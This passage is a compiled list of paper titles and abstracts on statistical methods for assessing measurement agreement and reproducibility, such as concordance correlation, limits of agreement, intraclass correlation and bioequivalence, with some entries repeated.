quick blood tests for measuring serum iron concentrations are estimated and compared. --- paper_title: Modeling Concordance Correlation via GEE to Evaluate Reproducibility paper_content: Summary. Clinical studies are often concerned with assessing whether different raters/methods produce similar values for measuring a quantitative variable. Use of the concordance correlation coefficient as a measure of reproducibility has gained popularity in practice since its introduction by Lin (1989, Biometrics45, 255–268). Lin's method is applicable for studies evaluating two raters/two methods without replications. Chinchilli et al. (1996, Biometrics52, 341–353) extended Lin's approach to repeated measures designs by using a weighted concordance correlation coefficient. However, the existing methods cannot easily accommodate covariate adjustment, especially when one needs to model agreement. In this article, we propose a generalized estimating equations (GEE) approach to model the concordance correlation coefficient via three sets of estimating equations. The proposed approach is flexible in that (1) it can accommodate more than two correlated readings and test for the equality of dependent concordant correlation estimates; (2) it can incorporate covariates predictive of the marginal distribution; (3) it can be used to identify covariates predictive of concordance correlation; and (4) it requires minimal distribution assumptions. A simulation study is conducted to evaluate the asymptotic properties of the proposed approach. The method is illustrated with data from two biomedical studies. --- paper_title: A Concordance Correlation Coefficient to Evaluate Reproducibility paper_content: A new reproducibility index is developed and studied. This index is the correlation between the two readings that fall on the 45 degree line through the origin. It is simple to use and possesses desirable properties. The statistical properties of this estimate can be satisfactorily evaluated using an inverse hyperbolic tangent transformation. A Monte Carlo experiment with 5,000 runs was performed to confirm the estimate's validity. An application using actual data is given. --- paper_title: Measuring agreement in method comparison studies paper_content: Agreement between two methods of clinical measurement can be quantified using the differences between observations made using the two methods on the same subjects. The 95% limits of agreement, estimated by mean difference +/- 1.96 standard deviation of the differences, provide an interval within which 95% of differences between measurements by the two methods are expected to lie. We describe how graphical methods can be used to investigate the assumptions of the method and we also give confidence intervals. We extend the basic approach to data where there is a relationship between difference and magnitude, both with a simple logarithmic transformation approach and a new, more general, regression approach. We discuss the importance of the repeatability of each method separately and compare an estimate of this to the limits of agreement. We extend the limits of agreement approach to data with repeated measurements, proposing new estimates for equal numbers of replicates by each method on each subject, for unequal numbers of replicates, and for replicated data collected in pairs, where the underlying value of the quantity being measured is changing. Finally, we describe a nonparametric approach to comparing methods. --- paper_title: Evaluating agreement with a gold standard in method comparison studies. paper_content: We develop a statistical model for method comparison studies where a gold standard is present and propose a measure of agreement. This measure can be interpreted as a population correlation coefficient in a constrained bivariate model. An estimator of this coefficient is proposed and its statistical properties explored. Applications of the new methodology to data from the medical literature are presented. --- paper_title: Quantitative imaging biomarkers: A review of statistical methods for technical performance assessment paper_content: Technological developments and greater rigor in the quantitative measurement of biological features in medical images have given rise to an increased interest in using quantitative imaging biomarkers to measure changes in these features. Critical to the performance of a quantitative imaging biomarker in preclinical or clinical settings are three primary metrology areas of interest: measurement linearity and bias, repeatability, and the ability to consistently reproduce equivalent results when conditions change, as would be expected in any clinical trial. Unfortunately, performance studies to date differ greatly in designs, analysis method, and metrics used to assess a quantitative imaging biomarker for clinical use. It is therefore difficult or not possible to integrate results from different studies or to use reported results to design studies. The Radiological Society of North America and the Quantitative Imaging Biomarker Alliance with technical, radiological, and statistical experts developed a set of... --- paper_title: An Overview on Assessing Agreement with Continuous Measurements paper_content: Reliable and accurate measurements serve as the basis for evaluation in many scientific disciplines. Issues related to reliable and accurate measurement have evolved over many decades, dating back to the nineteenth century and the pioneering work of Galton (1886), Pearson (1896, 1899, 1901), and Fisher (1925). Requiring a new measurement to be identical to the truth is often impractical, either because (1) we are willing to accept a measurement up to some tolerable (or acceptable) error, or (2) the truth is simply not available to us, either because it is not measurable or is only measurable with some degree of error. To deal with issues related to both (1) and (2), a number of concepts, methods, and theories have been developed in various disciplines. Some of these concepts have been used across disciplines, while others have been limited to a particular field but may have potential uses in other disciplines. In this paper, we elucidate and contrast fundamental concepts employed in different disciplines and unite these concepts into one common theme: assessing closeness (agreement) of observations. We focus on assessing agreement with continuous measurements and classify different statistical approaches as (1) descriptive tools; (2) unscaled summary indices based on absolute differences of measurements; and (3) scaled summary indices attaining values between -1 and 1 for various data structures, and for cases with and without a reference. We also identify gaps that require further research and discuss future directions in assessing agreement. --- paper_title: On population and individual bioequivalence. paper_content: In a traditional assessment of the bioequivalence of two formulations of a drug one compares the average bioavailability from the two formulations. Anderson and Hauck argued that in some situations it is not sufficient to demonstrate average bioequivalence, and they proposed a method for the assessment of what they called individual bioequivalence, which essentially is the comparison of the individual responses to the two drug formulations within subjects. In this paper we propose a unified strategy for the assessment of bioequivalence that encompasses new approaches to the assessment of both population bioequivalence, which is the comparison of the marginal or population distributions of bioavailabilities, and individual bioequivalence, which is the comparison of the conditional or within-subject distributions of bioavailabilities. The general idea is to use a comparison of the reference formulation to itself as the basis for the comparison of the test with the reference formulation. The new approaches overcome the main weakness of the current methods for the assessment of bioequivalence by considering the variability of bioavailabilities in addition to their means. The current methods for the assessment of bioequivalence, namely the conventional assessment of average bioequivalence and the proposal by Anderson and Hauck for the assessment of individual bioequivalence, emerge as special cases. One can evaluate the new bioequivalence criteria statistically by use of bootstrap confidence intervals. --- paper_title: Assessment of agreement using intersection-union principle. paper_content: We consider the problem of assessing agreement between two instruments and test whether the normally distributed bivariate data have evidence to claim satisfactory agreement. We focus on a comprehensive intersection-union formulation of the hypotheses of agreement. Confidence intervals associated with this approach provide information regarding the extent of agreement and nature of disagreement. We illustrate the suggested methodology using a dataset from the literature. --- paper_title: Assessing individual agreement. paper_content: Evaluating agreement between measurement methods or between observers is important in method comparison studies and in reliability studies. Often we are interested in whether a new method can replace an existing invasive or expensive method, or whether multiple methods or multiple observers can be used interchangeably. Ideally, interchangeability is established only if individual measurements from different methods are similar to replicated measurements from the same method. This is the concept of individual equivalence. Interchangeability between methods is similar to bioequivalence between drugs in bioequivalence studies. Following the FDA guidelines on individual bioequivalence, we propose to assess individual agreement among multiple methods via individual equivalence using the moment criteria. In the case where there is a reference method, we extend the individual bioequivalence criteria to individual equivalence criteria and propose to use individual equivalence coefficient (IEC) to compare multiple methods to one or multiple references. In the case where there is no reference method available, we propose a new IEC to assess individual agreement between multiple methods. Furthermore, we propose a coefficient of individual agreement (CIA) that links the IEC with two recent agreement indices. A method of moments is used for estimation, where one can utilize output from ANOVA models. The nonparametric and bootstrap approaches are used for inference. Five examples are used for illustration. --- paper_title: Tests for assessment of agreement using probability criteria paper_content: Abstract For the assessment of agreement using probability criteria, we obtain an exact test, and for sample sizes exceeding 30, we give a bootstrap- t test that is remarkably accurate. We show that for assessing agreement, the total deviation index approach of Lin [2000. Total deviation index for measuring individual agreement with applications in laboratory performance and bioequivalence. Statist. Med. 19, 255–270] is not consistent and may not preserve its asymptotic nominal level, and that the coverage probability approach of Lin et al. [2002. Statistical methods in assessing agreement: models, issues and tools. J. Amer. Statist. Assoc. 97, 257–270] is overly conservative for moderate sample sizes. We also show that the nearly unbiased test of Wang and Hwang [2001. A nearly unbiased test for individual bioequivalence problems using probability criteria. J. Statist. Plann. Inference 99, 41–58] may be liberal for large sample sizes, and suggest a minor modification that gives numerically equivalent approximation to the exact test for sample sizes 30 or less. We present a simple and accurate sample size formula for planning studies on assessing agreement, and illustrate our methodology with a real data set from the literature. --- paper_title: An Introduction to the Bootstrap paper_content: Introduction The Accuracy of a Sample Mean Random Samples and Probabilities The Empirical Distribution Function and the Plug-In Principle Standard Errors and Estimated Standard Errors The Bootstrap Estimate of Standard Error Bootstrap Standard Errors: Some Examples More Complicated Data Structures Regression Models Estimates of Bias The Jackknife Confidence Intervals Based on Bootstrap "Tables" Confidence Intervals Based on Bootstrap Percentiles Better Bootstrap Confidence Intervals Permutation Tests Hypothesis Testing with the Bootstrap Cross-Validation and Other Estimates of Prediction Error Adaptive Estimation and Calibration Assessing the Error in Bootstrap Estimates A Geometrical Representation for the Bootstrap and Jackknife An Overview of Nonparametric and Parametric Inference Further Topics in Bootstrap Confidence Intervals Efficient Bootstrap Computations Approximate Likelihoods Bootstrap Bioequivalence Discussion and Further Topics Appendix: Software for Bootstrap Computations References --- paper_title: Evaluating estimation techniques in medical imaging without a gold standard: experimental validation paper_content: Imaging is often used for the purpose of estimating the value of some parameter of interest. For example, a cardiologist may measure the ejection fraction (EF) of the heart to quantify how much blood is being pumped out of the heart on each stroke. In clinical practice, however, it is difficult to evaluate an estimation method because the gold standard is not known, e.g., a cardiologist does not know the true EF of a patient. An estimation method is typically evaluated by plotting its results against the results of another (more accepted) estimation method. This approach results in the use of one set of estimates as the pseudo-gold standard. We have developed a maximum-likelihood approach for comparing different estimation methods to the gold standard without the use of the gold standard. In previous works we have displayed the results of numerous simulation studies indicating the method can precisely and accurately estimate the parameters of a regression line without a gold standard, i.e., without the x-axis. In an attempt to further validate our method we have designed an experiment performing volume estimation using a physical phantom and two imaging systems (SPECT< CT). --- paper_title: Estimation in Medical Imaging without a Gold Standard 1 paper_content: Rationale and Objectives ::: In medical imaging, physicians often estimate a parameter of interest (eg, cardiac ejection fraction) for a patient to assist in establishing a diagnosis. Many different estimation methods may exist, but rarely can one be considered a gold standard. Therefore, evaluation and comparison of different estimation methods are difficult. The purpose of this study was to examine a method of evaluating different estimation methods without use of a gold standard. --- paper_title: The Use and Misuse of Orthogonal Regression in Linear Errors-in-Variables Models paper_content: Abstract Orthogonal regression is one of the standard linear regression methods to correct for the effects of measurement error in predictors. We argue that orthogonal regression is often misused in errors-in-variables linear regression because of a failure to account for equation errors. The typical result is to overcorrect for measurement error, that is, overestimate the slope, because equation error is ignored. The use of orthogonal regression must include a careful assessment of equation error, and not merely the usual (often informal) estimation of the ratio of measurement error variances. There are rarer instances, for example, an example from geology discussed here, where the use of orthogonal regression without proper attention to modeling may lead to either overcorrection or undercorrection, depending on the relative sizes of the variances involved. Thus our main point, which does not seem to be widely appreciated, is that orthogonal regression, just like any measurement error analysis, requires ... --- paper_title: Modelling method comparison data paper_content: We explore a range of linear regression models that might be useful for either: (a) the relative calibration of two or more methods or (b) to evaluate their precisions relative to each other. Ideally, one should be able to use a single data set to carry out the jobs (a) and (b) together. Throughout this review we consider the constraints (assumptions) needed to attain identifiability of the models and the possible pitfalls to the unwary in having to introduce them. We also pay particular attention to the possible problems arising from the presence of random matrix effects (reproducible random measurement 'errors' that are characteristic of a given method when being used on a given specimen or sample, i.e. specimen specific biases or subject by method interactions). Finally, we stress the importance of a fully-informative design (using replicate measurements on each subject using at least three independent methods) and large sample sizes. --- paper_title: Objective Comparison of Quantitative Imaging Modalities Without the Use of a Gold Standard paper_content: Imaging is often used for the purpose of estimating the value of some parameter of interest. For example, a cardiologist may measure the ejection fraction (EF) of the heart in order to know how much blood is being pumped out of the heart on each stroke. In clinical practice, however, it is difficult to evaluate an estimation method because the gold standard is not known, e.g., a cardiologist does not know the true EF of a patient. Thus, researchers have often evaluated an estimation method by plotting its results against the results of another (more accepted) estimation method, which amounts to using one set of estimates as the pseudogold standard. In this paper, we present a maximum-likelihood approach for evaluating and comparing different estimation methods without the use of a gold standard with specific emphasis on the problem of evaluating EF estimation methods. Results of numerous simulation studies will be presented and indicate that the method can precisely and accurately estimate the parameters of a regression line without a gold standard, i.e., without the x axis. --- paper_title: Validation of image segmentation by estimating rater bias and variance paper_content: The accuracy and precision of segmentations of medical images has been difficult to quantify in the absence of a 'ground truth' or reference standard segmentation for clinical data. Although physical or digital phantoms can help by providing a reference standard, they do not allow the reproduction of the full range of imaging and anatomical characteristics observed in clinical data. An alternative assessment approach is to compare with segmentations generated by domain experts. Segmentations may be generated by raters who are trained experts or by automated image analysis algorithms. Typically, these segmentations differ due to intra-rater and inter-rater variability. The most appropriate way to compare such segmentations has been unclear. We present here a new algorithm to enable the estimation of performance characteristics, and a true labelling, from observations of segmentations of imaging data where segmentation labels may be ordered or continuous measures. This approach may be used with, among others, surface, distance transform or level-set representations of segmentations, and can be used to assess whether or not a rater consistently overestimates or underestimates the position of a boundary. --- paper_title: Estimation in Medical Imaging without a Gold Standard 1 paper_content: Rationale and Objectives ::: In medical imaging, physicians often estimate a parameter of interest (eg, cardiac ejection fraction) for a patient to assist in establishing a diagnosis. Many different estimation methods may exist, but rarely can one be considered a gold standard. Therefore, evaluation and comparison of different estimation methods are difficult. The purpose of this study was to examine a method of evaluating different estimation methods without use of a gold standard. --- paper_title: Objective Comparison of Quantitative Imaging Modalities Without the Use of a Gold Standard paper_content: Imaging is often used for the purpose of estimating the value of some parameter of interest. For example, a cardiologist may measure the ejection fraction (EF) of the heart in order to know how much blood is being pumped out of the heart on each stroke. In clinical practice, however, it is difficult to evaluate an estimation method because the gold standard is not known, e.g., a cardiologist does not know the true EF of a patient. Thus, researchers have often evaluated an estimation method by plotting its results against the results of another (more accepted) estimation method, which amounts to using one set of estimates as the pseudogold standard. In this paper, we present a maximum-likelihood approach for evaluating and comparing different estimation methods without the use of a gold standard with specific emphasis on the problem of evaluating EF estimation methods. Results of numerous simulation studies will be presented and indicate that the method can precisely and accurately estimate the parameters of a regression line without a gold standard, i.e., without the x axis. --- paper_title: A New Biometrical Procedure for Testing the Equality of Measurements from Two Different Analytical Methods. Application of linear regression procedures for method comparison studies in Clinical Chemistry, Part I paper_content: Procedures for the statistical evaluation of method comparisons and instrument tests often have a requirement for distributional properties of the experimental data, but this requirement is frequently not met. In our paper we propose a new linear regression procedure with no special assumptions regarding the distribution of the samples and the measurement errors. The result does not depend on the assignment of the methods (instruments) to X and Y. After testing a linear relationship between X and Y confidence limits are given for the slope beta and the intercept alpha; they are used to determine whether there is only a chance difference between beta and 1 and between alpha and 0. The mathematical background is amplified separately in an appendix. --- paper_title: Modelling method comparison data paper_content: We explore a range of linear regression models that might be useful for either: (a) the relative calibration of two or more methods or (b) to evaluate their precisions relative to each other. Ideally, one should be able to use a single data set to carry out the jobs (a) and (b) together. Throughout this review we consider the constraints (assumptions) needed to attain identifiability of the models and the possible pitfalls to the unwary in having to introduce them. We also pay particular attention to the possible problems arising from the presence of random matrix effects (reproducible random measurement 'errors' that are characteristic of a given method when being used on a given specimen or sample, i.e. specimen specific biases or subject by method interactions). Finally, we stress the importance of a fully-informative design (using replicate measurements on each subject using at least three independent methods) and large sample sizes. --- paper_title: Regression Models for Method Comparison Data paper_content: Regression methods for the analysis of paired measurements produced by two fallible assay methods are described and their advantages and pitfalls discussed. The difficulties for the analysis, as in any errors-in-variables problem lies in the lack of identifiability of the model and the need to introduce questionable and often naive assumptions in order to gain identifiability. Although not a panacea, the use of instrumental variables and associated instrumental variable (IV) regression methods in this area of application has great potential to improve the situation. Large samples are frequently needed and two-phase sampling methods are introduced to improve the efficiency of the IV estimators. --- paper_title: A missing information principle: theory and applications paper_content: Abstract : The problem that a relatively simple analysis is changed into a complex one just because some of the information is missing, is one which faces most practicing statisticians at some point in their career. Obviously the best way to treat missing information problems is not to have them. Unfortunately circumstances arise in which information is missing and nothing can be done to replace it for one reason or another. --- paper_title: The emerging science of quantitative imaging biomarkers terminology and definitions for scientific studies and regulatory submissions paper_content: The development and implementation of quantitative imaging biomarkers has been hampered by the inconsistent and often incorrect use of terminology related to these markers. Sponsored by the Radiological Society of North America, an interdisciplinary group of radiologists, statisticians, physicists, and other researchers worked to develop a comprehensive terminology to serve as a foundation for quantitative imaging biomarker claims. Where possible, this working group adapted existing definitions derived from national or international standards bodies rather than invent new definitions for these terms. This terminology also serves as a foundation for the design of studies that evaluate the technical performance of quantitative imaging biomarkers and for studies of algorithms that generate the quantitative imaging biomarkers from clinical scans. This paper provides examples of research studies and quantitative imaging biomarker claims that use terminology consistent with these definitions as well as examples... --- paper_title: Statistical methods in assessing agreement: Models, issues, and tools paper_content: Measurements of agreement are needed to assess the acceptability of a new or generic process, methodology, and formulation in areas of laboratory performance, instrument or assay validation, method comparisons, statistical process control, goodness of fit, and individual bioequivalence. In all of these areas, one needs measurements that capture a large proportion of data that are within a meaningful boundary from target values. Target values can be considered random (measured with error) or fixed (known), depending on the situation. Various meaningful measures to cope with such diverse and complex situations have become available only in the last decade. These measures often assume that the target values are random. This article reviews the literature and presents methodologies in terms of “coverage probability.” In addition, analytical expressions are introduced for all of the aforementioned measurements when the target values are fixed and when the error structure is homogenous or heterogeneous (proport... --- paper_title: Forming inferences about some intraclass correlation coefficients. paper_content: Although intraclass correlation coefficients (ICCs) are commonly used in behavioral measurement, psychometrics, and behavioral genetics, procedures available for forming inferences about ICCs are not widely known. Following a review of the distinction between various forms of the ICC, this article presents procedures available for calculating confidence intervals and conducting tests on ICCs developed using data from one-way and two-way random and mixed-effect analysis of variance models. --- paper_title: Measuring agreement in method comparison studies paper_content: Agreement between two methods of clinical measurement can be quantified using the differences between observations made using the two methods on the same subjects. The 95% limits of agreement, estimated by mean difference +/- 1.96 standard deviation of the differences, provide an interval within which 95% of differences between measurements by the two methods are expected to lie. We describe how graphical methods can be used to investigate the assumptions of the method and we also give confidence intervals. We extend the basic approach to data where there is a relationship between difference and magnitude, both with a simple logarithmic transformation approach and a new, more general, regression approach. We discuss the importance of the repeatability of each method separately and compare an estimate of this to the limits of agreement. We extend the limits of agreement approach to data with repeated measurements, proposing new estimates for equal numbers of replicates by each method on each subject, for unequal numbers of replicates, and for replicated data collected in pairs, where the underlying value of the quantity being measured is changing. Finally, we describe a nonparametric approach to comparing methods. --- paper_title: Comparison of ICC and CCC for assessing agreement for data without and with replications paper_content: The intraclass correlation coefficient (ICC) has been traditionally used for assessing reliability between multiple observers for data with or without replications. Definitions of different versions of ICCs depend on the assumptions of specific ANOVA models. The parameter estimator for the ICC is usually based on the method of moments with the underlying assumed ANOVA model. This estimator is consistent only if the ANOVA model assumptions hold. Often these ANOVA assumptions are not met in practice and researchers may compute these estimates without verifying the assumptions. ICC is biased if the ANOVA assumptions are not met. We compute the expected value of the ICC estimator under a very general model to get a sense of the population parameter that the ICC estimator provides. We compare this expected value to another popular agreement index, concordance correlation coefficient (CCC), which is defined without ANOVA assumptions. The main findings are reported for data without replication and with replications for three types of ICCs defined by one-way ANOVA model, two-way ANOVA model without interaction and two-way ANOVA model with interaction. A blood pressure example is used for illustration. If the ICC is the choice of agreement index, we recommend to use ICC"3 over other ICCs as its estimate is similar to the estimate of CCC regardless whether the ANOVA assumptions are met or not. --- paper_title: Statistical methods in assessing agreement: Models, issues, and tools paper_content: Measurements of agreement are needed to assess the acceptability of a new or generic process, methodology, and formulation in areas of laboratory performance, instrument or assay validation, method comparisons, statistical process control, goodness of fit, and individual bioequivalence. In all of these areas, one needs measurements that capture a large proportion of data that are within a meaningful boundary from target values. Target values can be considered random (measured with error) or fixed (known), depending on the situation. Various meaningful measures to cope with such diverse and complex situations have become available only in the last decade. These measures often assume that the target values are random. This article reviews the literature and presents methodologies in terms of “coverage probability.” In addition, analytical expressions are introduced for all of the aforementioned measurements when the target values are fixed and when the error structure is homogenous or heterogeneous (proport... --- paper_title: STATISTICAL METHODS FOR ASSESSING AGREEMENT BETWEEN TWO METHODS OF CLINICAL MEASUREMENT paper_content: In clinical measurement comparison of a new measurement technique with an established one is often needed to see whether they agree sufficiently for the new to replace the old. Such investigations are often analysed inappropriately, notably by using correlation coefficients. The use of correlation is misleading. An alternative approach, based on graphical techniques and simple calculations, is described, together with the relation between this analysis and the assessment of repeatability. --- paper_title: Five-year lung cancer screening experience: CT appearance, growth rate, location, and histologic features of 61 lung cancers. paper_content: PURPOSE ::: To retrospectively evaluate the computed tomography (CT)-determined size, morphology, location, morphologic change, and growth rate of incidence and prevalence lung cancers detected in high-risk individuals who underwent annual chest CT screening for 5 years and to evaluate the histologic features and stages of these cancers. ::: ::: ::: MATERIALS AND METHODS ::: The study was institutional review board approved and HIPAA compliant. Informed consent was waived. CT scans of 61 cancers (24 in men, 37 in women; age range, 53-79 years; mean, 65 years) were retrospectively reviewed for cancer size, morphology, and location. Forty-eight cancers were assessed for morphologic change and volume doubling time (VDT), which was calculated by using a modified Schwartz equation. Histologic sections were retrospectively reviewed. ::: ::: ::: RESULTS ::: Mean tumor size was 16.4 mm (range, 5.5-52.5 mm). Most common CT morphologic features were as follows: for bronchioloalveolar carcinoma (BAC) (n = 9), ground-glass attenuation (n = 6, 67%) and smooth (n = 3, 33%), irregular (n = 3, 33%), or spiculated (n = 3, 33%) margin; for non-BAC adenocarcinomas (n = 25), semisolid (n = 11, 44%) or solid (n = 12, 48%) attenuation and irregular margin (n = 14, 56%); for squamous cell carcinoma (n = 14), solid attenuation (n = 12, 86%) and irregular margin (n = 10, 71%); for small cell or mixed small and large cell neuroendocrine carcinoma (n = 7), solid attenuation (n = 6, 86%) and irregular margin (n = 5, 71%); for non-small cell carcinoma not otherwise specified (n = 5), solid attenuation (n = 4, 80%) and irregular margin (n = 3, 60%); and for large cell carcinoma (n = 1), solid attenuation and spiculated shape (n = 1, 100%). Attenuation most often (in 12 of 21 cases) increased. Margins most often (in 16 of 20 cases) became more irregular or spiculated. Mean VDT was 518 days. Thirteen of 48 cancers had a VDT longer than 400 days; 11 of these 13 cancers were in women. ::: ::: ::: CONCLUSION ::: Overdiagnosis, especially in women, may be a substantial concern in lung cancer screening. --- paper_title: Forming inferences about some intraclass correlation coefficients. paper_content: Although intraclass correlation coefficients (ICCs) are commonly used in behavioral measurement, psychometrics, and behavioral genetics, procedures available for forming inferences about ICCs are not widely known. Following a review of the distinction between various forms of the ICC, this article presents procedures available for calculating confidence intervals and conducting tests on ICCs developed using data from one-way and two-way random and mixed-effect analysis of variance models. --- paper_title: On Estimating Precision of Measuring Instruments and Product Variability paper_content: Abstract A measurement or observed value is discussed as the sum of two components—one the absolute value of the characteristic measured and the other an error of measurement. The variation in absolute values of the characteristic or items measured is termed product variability, whereas the variation in errors of measurement of an instrument is called the precision or reproducibility of measurement. Techniques are given for separating and estimating product variability and precision of measurement. Comparisons of the various techniques are also discussed for cases involving two or more instruments. --- paper_title: Measuring agreement in method comparison studies paper_content: Agreement between two methods of clinical measurement can be quantified using the differences between observations made using the two methods on the same subjects. The 95% limits of agreement, estimated by mean difference +/- 1.96 standard deviation of the differences, provide an interval within which 95% of differences between measurements by the two methods are expected to lie. We describe how graphical methods can be used to investigate the assumptions of the method and we also give confidence intervals. We extend the basic approach to data where there is a relationship between difference and magnitude, both with a simple logarithmic transformation approach and a new, more general, regression approach. We discuss the importance of the repeatability of each method separately and compare an estimate of this to the limits of agreement. We extend the limits of agreement approach to data with repeated measurements, proposing new estimates for equal numbers of replicates by each method on each subject, for unequal numbers of replicates, and for replicated data collected in pairs, where the underlying value of the quantity being measured is changing. Finally, we describe a nonparametric approach to comparing methods. --- paper_title: Comparison of ICC and CCC for assessing agreement for data without and with replications paper_content: The intraclass correlation coefficient (ICC) has been traditionally used for assessing reliability between multiple observers for data with or without replications. Definitions of different versions of ICCs depend on the assumptions of specific ANOVA models. The parameter estimator for the ICC is usually based on the method of moments with the underlying assumed ANOVA model. This estimator is consistent only if the ANOVA model assumptions hold. Often these ANOVA assumptions are not met in practice and researchers may compute these estimates without verifying the assumptions. ICC is biased if the ANOVA assumptions are not met. We compute the expected value of the ICC estimator under a very general model to get a sense of the population parameter that the ICC estimator provides. We compare this expected value to another popular agreement index, concordance correlation coefficient (CCC), which is defined without ANOVA assumptions. The main findings are reported for data without replication and with replications for three types of ICCs defined by one-way ANOVA model, two-way ANOVA model without interaction and two-way ANOVA model with interaction. A blood pressure example is used for illustration. If the ICC is the choice of agreement index, we recommend to use ICC"3 over other ICCs as its estimate is similar to the estimate of CCC regardless whether the ANOVA assumptions are met or not. --- paper_title: Assessing reproducibility by the within-subject coefficient of variation with random effects models. paper_content: In this paper we consider the use of within-subject coefficient of variation (WCV) for assessing the reproducibility or reliability of a measurement. Application to assessing reproducibility of biochemical markers for measuring bone turnover is described and the comparison with intraclass correlation is discussed. Both maximum likelihood and moment confidence intervals of WCV are obtained through their corresponding asymptotic distributions. Normal and log-normal cases are considered. In general, WCV is preferred when the measurement scale bears intrinsic meaning and is not subject to arbitrary shifting. The intraclass correlation may be preferred when a fixed population of subjects can be well identified. --- paper_title: Testing Statistical Hypotheses of Equivalence paper_content: Introduction. Methods for One-Sided Equivalence Problems. General Approaches to the Construction of Tests for Equivalence in the Strict Sense. Equivalence Tests for Selected One-Parameter Problems. Equivalence Tests for Designs with Paired Observation. Equivalence Tests for Two Unrelated Samples. Multi-sample Tests for Equivalence. Tests for Establishing Goodness of Fit. The Assessment of Bio-Equivalence. Appendix. References. Index --- paper_title: Measuring agreement in method comparison studies paper_content: Agreement between two methods of clinical measurement can be quantified using the differences between observations made using the two methods on the same subjects. The 95% limits of agreement, estimated by mean difference +/- 1.96 standard deviation of the differences, provide an interval within which 95% of differences between measurements by the two methods are expected to lie. We describe how graphical methods can be used to investigate the assumptions of the method and we also give confidence intervals. We extend the basic approach to data where there is a relationship between difference and magnitude, both with a simple logarithmic transformation approach and a new, more general, regression approach. We discuss the importance of the repeatability of each method separately and compare an estimate of this to the limits of agreement. We extend the limits of agreement approach to data with repeated measurements, proposing new estimates for equal numbers of replicates by each method on each subject, for unequal numbers of replicates, and for replicated data collected in pairs, where the underlying value of the quantity being measured is changing. Finally, we describe a nonparametric approach to comparing methods. --- paper_title: Regression Models for Method Comparison Data paper_content: Regression methods for the analysis of paired measurements produced by two fallible assay methods are described and their advantages and pitfalls discussed. The difficulties for the analysis, as in any errors-in-variables problem lies in the lack of identifiability of the model and the need to introduce questionable and often naive assumptions in order to gain identifiability. Although not a panacea, the use of instrumental variables and associated instrumental variable (IV) regression methods in this area of application has great potential to improve the situation. Large samples are frequently needed and two-phase sampling methods are introduced to improve the efficiency of the IV estimators. --- paper_title: The emerging science of quantitative imaging biomarkers terminology and definitions for scientific studies and regulatory submissions paper_content: The development and implementation of quantitative imaging biomarkers has been hampered by the inconsistent and often incorrect use of terminology related to these markers. Sponsored by the Radiological Society of North America, an interdisciplinary group of radiologists, statisticians, physicists, and other researchers worked to develop a comprehensive terminology to serve as a foundation for quantitative imaging biomarker claims. Where possible, this working group adapted existing definitions derived from national or international standards bodies rather than invent new definitions for these terms. This terminology also serves as a foundation for the design of studies that evaluate the technical performance of quantitative imaging biomarkers and for studies of algorithms that generate the quantitative imaging biomarkers from clinical scans. This paper provides examples of research studies and quantitative imaging biomarker claims that use terminology consistent with these definitions as well as examples... --- paper_title: The Problem of Conversion in Method Comparison Studies paper_content: SUMMARY This paper introduces an extension of the well-known method comparison problem previously studied by Altman and Bland and others. The problem concerns the comparison of two approximate methods of measuring a quantity which return results expressed in different units. Such situations can arise where the methods in question proceed by measuring proxy quantities. Thus the data sets need to be converted to the same units before comparisons may take place. The paper presents an approach to this problem based on the theory of structural relationship models. This approach is applied to data gathered by two approximate methods of measuring the fuel consumption of motor vehicles. --- paper_title: Confidence Intervals on Nonnegative Linear Combinations of Variances paper_content: Abstract Smith (1936) suggested a method that can be used for setting confidence limits on linear combinations of variances. This method was studied and expanded by Satterthwaite (1941, 1946) and has become known as Satterthwaite's procedure. The procedure has been widely used for the past 40 years. In this article a new procedure is proposed for this problem that is better than Satterthwaite's procedure and very easy to compute from existing tables. --- paper_title: The emerging science of quantitative imaging biomarkers terminology and definitions for scientific studies and regulatory submissions paper_content: The development and implementation of quantitative imaging biomarkers has been hampered by the inconsistent and often incorrect use of terminology related to these markers. Sponsored by the Radiological Society of North America, an interdisciplinary group of radiologists, statisticians, physicists, and other researchers worked to develop a comprehensive terminology to serve as a foundation for quantitative imaging biomarker claims. Where possible, this working group adapted existing definitions derived from national or international standards bodies rather than invent new definitions for these terms. This terminology also serves as a foundation for the design of studies that evaluate the technical performance of quantitative imaging biomarkers and for studies of algorithms that generate the quantitative imaging biomarkers from clinical scans. This paper provides examples of research studies and quantitative imaging biomarker claims that use terminology consistent with these definitions as well as examples... --- paper_title: Applications of the repeatability of quantitative imaging biomarkers: a review of statistical analysis of repeat data sets. paper_content: Repeat imaging data sets performed on patients with cancer are becoming publicly available. The potential utility of these data sets for addressing important questions in imaging biomarker development is vast. In particular, these data sets may be useful to help characterize the variability of quantitative parameters derived from imaging. This article reviews statistical analysis that may be performed to use results of repeat imaging to 1) calculate the level of change in parameter value that may be seen in individual patients to confidently characterize that patient as showing true parameter change, 2) calculate the level of change in parameters value that may be seen in individual patients to confidently categorize that patient as showing true lack of parameter change, 3) determine if different imaging devices are interchangeable from the standpoint of repeatability, and 4) estimate the numbers of patients needed to precisely calculate repeatability. In addition, we recommend a set of statistical parameters that should be reported when the repeatability of continuous parameters is studied. --- paper_title: Assessing agreement between measurements recorded on a ratio scale in sports medicine and sports science. paper_content: OBJECTIVE ::: The consensus of opinion suggests that when assessing measurement agreement, the most appropriate statistic to report is the "95% limits of agreement". The precise form that this interval takes depends on whether a positive relation exists between the differences in measurement methods (errors) and the size of the measurements--that is, heteroscedastic errors. If a positive and significant relation exists, the recommended procedure is to report "the ratio limits of agreement" using log transformed measurements. This study assessed the prevalence of heteroscedastic errors when investigating measurement agreement of variables recorded on a ratio scale in sports medicine and sports science. ::: ::: ::: METHODS ::: Measurement agreement (or repeatability) was assessed in 13 studies (providing 23 examples) conducted in the Centre for Sport and Exercise Sciences at Liverpool John Moores University over the past five years. ::: ::: ::: RESULTS ::: The correlation between the absolute differences and the mean was positive in all 23 examples (median r = 0.37), eight being significant (P < 0.05). In 21 of 23 examples analysed, the correlation was greater than the equivalent correlation using log transformed measurements (median r = 0.01). Based on a simple meta-analysis, the assumption that no relation exists between the measurement differences and the size of measurement must be rejected (P < 0.001). ::: ::: ::: CONCLUSIONS ::: When assessing measurement agreement of variables recorded on a ratio scale in sports medicine and sports science, this study (23 examples) provides strong evidence that heteroscedastic errors are the norm. If the correlation between the absolute measurement differences and the means is positive (but not necessarily significant) and greater than the equivalent correlation using log transformed measurements, the authors recommend reporting the "ratio limits of agreement". ---
